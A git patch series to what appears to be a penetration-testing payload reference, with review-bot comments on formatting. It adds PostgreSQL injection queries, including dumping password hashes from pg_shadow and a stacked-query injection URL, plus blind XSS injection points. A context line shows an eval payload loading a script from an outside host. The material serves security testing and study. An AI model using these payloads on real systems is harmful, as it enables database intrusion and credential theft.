From 3dcd4425a87012f147fd1b995b7ed81debf7bb26 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Mon, 28 Oct 2019 16:26:49 +0530 Subject: [PATCH 1/2] Added more PostgreSQL Injection Queries * PostgreSQL version * PostgreSQL Current User * PostgreSQL List Users * PostgreSQL List Password Hashes * PostgreSQL List Privileges * PostgreSQL database name * PostgreSQL List databases * PostgreSQL List tables * PostgreSQL List columns * PostgreSQL Stacked query --- SQL Injection/PostgreSQL Injection.md | 76 +++++++++++++++++++++++++++ 1 file changed, 76 insertions(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index b8d962d..d923c5a 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -3,9 +3,19 @@ ## Summary * [PostgreSQL Comments](#postgresql-comments) +* [PostgreSQL version](#postgresql-version) +* [PostgreSQL Current User](#postgresql-current-user) +* [PostgreSQL List Users](#postgresql-list-users) +* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Privileges](#postgresql-list-privileges) +* [PostgreSQL database name](#postgresql-database-name) +* [PostgreSQL List databases](#postgresql-list-database) +* [PostgreSQL List tables](#postgresql-list-tables) +* [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) +* [PostgreSQL Stacked query](#postgresql-stacked-query) * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) 
@@ -20,6 +30,64 @@ /**/ ``` +## PostgreSQL Version + +```sql +SELECT version() +``` + +## PostgreSQL Current User + +```sql +SELECT user; +SELECT current_user; +SELECT session_user; +SELECT usename FROM pg_user; +SELECT getpgusername(); +``` + +## PostgreSQL List Users + +```sql +SELECT usename FROM pg_user +``` + +## PostgreSQL List Password Hashes + +```sql +SELECT usename, passwd FROM pg_shadow +``` + +## PostgreSQL List Privileges + +```sql +SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user +``` + +## PostgreSQL Database Name + +```sql +SELECT current_database() +``` + +## PostgreSQL List Database + +```sql +SELECT datname FROM pg_database +``` + +## PostgreSQL List Tables + +```sql +SELECT table_name FROM information_schema.tables +``` + +## PostgreSQL List Columns + +```sql +SELECT column_name FROM information_schema.columns WHERE table_name='data_table' +``` + ## PostgreSQL Error Based ```sql @@ -48,6 +116,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` +## PostgreSQL Stacked Query + +Use a semi-colon ";" to add another query + +```sql +http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- +``` + ## PostgreSQL File Read ```sql From ab341cff384ffc2f218a54bf08b67f1beb850f36 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Mon, 28 Oct 2019 16:51:36 +0530 Subject: [PATCH 2/2] Updated Blind XSS endpoint * User Agent * Comment Box --- XSS Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index a0ccd8a..f8cac69 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
@@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Referer Header - Custom Site Analytics - Administrative Panel logs +- User Agent + - Custom Site Analytics + - Administrative Panel logs +- Comment Box + - Administrative Panel + ## Polyglot XSS
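Review bot: The link text added to the Summary in the first hunk of PATCH 1/2 (@@ -3,9 +3,19 @@) does not match the headings the same patch introduces. The list has "PostgreSQL version", "PostgreSQL database name" and "PostgreSQL List databases", while the sections are titled "PostgreSQL Version", "PostgreSQL Database Name" and "PostgreSQL List Database". The anchors resolve, but the entry text should be copied from the headings so the table of contents and the sections read the same, and the singular or plural form of "database" should be settled in both places.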
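Review bot: In the "PostgreSQL Current User" block of the second hunk of PATCH 1/2 (@@ -20,6 +30,64 @@), `SELECT usename FROM pg_user;` does not belong: it is the same query the patch lists under "PostgreSQL List Users" and returns every row of the view, not the current user. Remove it from the Current User block. The new blocks also mix terminated and unterminated statements (`SELECT version()` next to `SELECT user;`), so pick one form. The table name 'data_table' in the List Columns query is a placeholder and should be marked as one, in the bracketed style the file already uses for [RANDNUM] and [SLEEPTIME].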
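Review bot: The fenced block under "PostgreSQL Stacked Query" in the third hunk of PATCH 1/2 (@@ -48,6 +116,14 @@) is tagged sql but contains a full URL, so it will be highlighted as SQL although it is not valid SQL. Either drop the language tag or reduce the block to the SQL fragment and describe the request in the prose line. That prose line, "Use a semi-colon ";" to add another query", should also end with a period and use "semicolon", and the host and path in the example should be stated to be placeholders.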
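Review bot: In the PATCH 2/2 hunk (@@ -416,6 +416,12 @@), the sub-items added under "User Agent" repeat "Custom Site Analytics" and "Administrative Panel logs" word for word from the "Referer Header" entry just above in the context lines. Consider merging the two into a single request-header entry instead of duplicating the list. Under "Comment Box" the sub-item is "Administrative Panel" while the others say "Administrative Panel logs"; make the wording consistent or state that the difference is intended. The hunk also adds a second blank line before "## Polyglot XSS", which can be dropped.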